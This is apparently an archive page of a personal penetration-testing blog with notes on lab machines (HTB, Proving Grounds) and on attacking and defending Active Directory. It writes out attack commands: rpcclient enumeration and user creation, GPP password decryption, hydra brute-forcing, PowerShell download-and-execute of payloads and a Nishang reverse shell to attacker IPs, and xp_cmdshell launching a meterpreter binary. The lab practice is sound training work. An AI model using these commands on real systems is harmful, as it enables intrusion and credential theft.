Posts

Showing posts from September, 2022

RPC: It's Actually Useful Jutsu

Image
Where have I seen RPC be useful? Need to collect usernames to brute-force. Request a TGS-Ticket by username ONLY: AS-REP Kerberoasting A password was left in the AD User Description https://www.hackingarticles.in/active-directory-enumeration-rpcclient/ 1. Login with RPC rpcclient -U "" -N 10.10.10.161 1. enumdomusers 2. queryuser queryuser svc-alfresco 3. enumdomgroups and querygroup enumdomgroups querygroup 0x200 querygroupmem 0x200 (get the group member IDs) 4. Get Password Info rpcclient $> getdompwinfo min_password_length: 7 password_properties: 0x00000000 5. Create a User (Need priv) createdomuser hacker setuserinfo2 hacker 24 Password@1 enumdomusers

Active HTB Active Directory

Image
smbget -R smb://anonymous:anonymous@10.10.10.100/Replication Run smbget to retrieve all the files. Find Group.xml located in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Group.xml Run gpp-decrypt on the cPassword hash. Logging in is not working. However kerberoasting and secretdump can still work. Trying Stuff Out (Not related to solving this box) Nice little sambaserver trick works when downloading fails ^ Lessons Learned See SYSVOL? Have access to SYSVOL? Older box? GPP Password Decryption may work. Group.xml is the file to look for. Used kerberoasting. GPP good for pre and post exploit. Found smbget command.

PG Hutch: Active Directory

Image
I was stuck on this box for two days. My MiTM attacks did not work. Traffic is dead. Restarting the box usually triggers the IPv6 poisoning MiTM. Does not work. Next step is Samba exploits. No vulns there. Which leaves us to 'what next'? This is a great box to collect more enumeration skills and attack vectors. The obvious WebDav keeps screaming at me. It has a BasicAuth on it. I find out you can enumerate users with Kerbrute. I try that. I get "admin" (custom) and "Administrator" (default). I don't know how to brute BasicAuth. I google "how to brute WebDav" which is a bad google. I corrected to "how to brute BasicAuth". I get a hydra command. I run that against multiple password lists with the user "admin". No luck. IT WOULD however work, and is good to keep for the future. hydra -l fmcsorley -P passwords.txt 192.168.210.122 http-get / -I Follow these two articles when enumerating LDAP: https://book.hac...

Attack Active Directory: Enumeration

Image
MITM and Samba exploits not working? 1. Kerberos Username Enumeration Download Here: https://github.com/ropnop/kerbrute/releases . Install, chmod the file, thats it. 2. LDAP Enumeration Check out: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap and https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) >>> connection = ldap3.Connection(server) >>> connection.bind() True >>> server.info >>> connection.search(search_base='DC=vault,DC=offsec', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') >>> connection.entries >>> connection.search(search_base='DC=htb,DC=local', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') >...

Powershell Jutsus

Always Do powershell -ep bypass -nop powershell -ExecutionPolicy Bypass -nop .\LoadAPowerShellFileWhenInPowershell.ps1 1. Download Files powershell Invoke-WebRequest -OutFile C:\Users\Public\Documents\shell.exe -Uri http://192.168.49.210/shell.exe powershell -c (New-Object System.Net.WebClient).DownloadFile("http://192.168.200.187/winPEAS.exe", "C:\Users\Administrator\Desktop\winPEAS.exe") powershell.exe -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.210/PowerUp.ps1');Invoke-AllChecks Reverse Shells 1. Nishang Link to Nishang: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.49.232/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.49.232 -Port 44 2. Mini-Reverse Change the first line of the file to your IP and port. Link to mini-reverse.ps1: https://gist.githubuser...

PG Meathead

Image
impacket-mssqlclient sa:EjectFrailtyThorn425@192.168.230.70 -p 1435 smbserver.py Share . xp_cmdshell \\192.168.49.210\Share\power.exe (meterpreter shell) powershell Invoke-WebRequest -OutFile C:\Users\Public\Documents\PrintSpooferx64.exe -Uri http://192.168.49.210/PrintSpooferx64.exe Box is hard. Only got shell. Had to lookup walkthroughs. Its okay, as long as I learn something and don't repeat the same mistake again. I'll be using smbserver over http.server, just to get the hang of it. It will become a permanent jutsu of mine from now on. Lessons Learned Set up a smbserver.py if downloading is not working and/or Antivirus is getting in the way. My PrintSpoofer worked. Metasploit getsystem will also use PrintSpoofer. First Hard Box on PG attempted.

PG Walla

Image
This took me more than 3 hours. My nmap didn't return the correct number of ports. Third time this happened. Once I got super stuck, I reran nmap for the third time. Three new ports appeared. I finished the entire machine on my pink Macbook too. I spent a good 1.5 hours editing this BraveStarr script. Then I nmap'd again after being fed up. It can't be this. A Rasp Ap exists on port 8091. Google default creds. It's admin/secret. Navigate to system tab and you'll see a shell. Put OpenBSD payload in there. This box is littered with priv esc. The www-data user can run sudo commands. The /usr/bin/python /home/walter/wifi_reset.py will work. Make a python reverse shell. Name it wifi_reset.py. Upload to /home/walter folder. Delete the old wifi_reset.py. We can't edit it. Lessons Learned hydra did not work for telnet. ncrack did not work for telnet. Use msfconsole as an option. Maybe slow down nmap. I wonder if that will help. -...

Defense for Microsoft Active Directory

Image
1. Turn off LLMNR More info: https://www.blackhillsinfosec.com/how-to-disable-llmnr-why-you-want-to/ 2. Disable NBT-NS Disabling the use and support of NetBIOS can help to mitigate an attacker's ability to: poison and spoof responses, obtain a user's hashed credentials, inspect web traffic, etc. 3. Turn on SMB Signing on All Devices Old article, but still works: https://www.itprotoday.com/security/how-do-i-enable-smb-signing 4. Multiple Steps for Ipv6 1. Disable IPv6 via Group Policy and Firewall. If you disable it completely, it can cause issues. Recommended: Firewall DISABLE . (Inbound) Core Networking - Dynamic Host Configuraiton Protocol for IPv6 (DHCPV6-IN) (Inbound) Core Networking - Router Advertisement (ICMPv6-In) (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out) 2. If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service. https://docs.mi...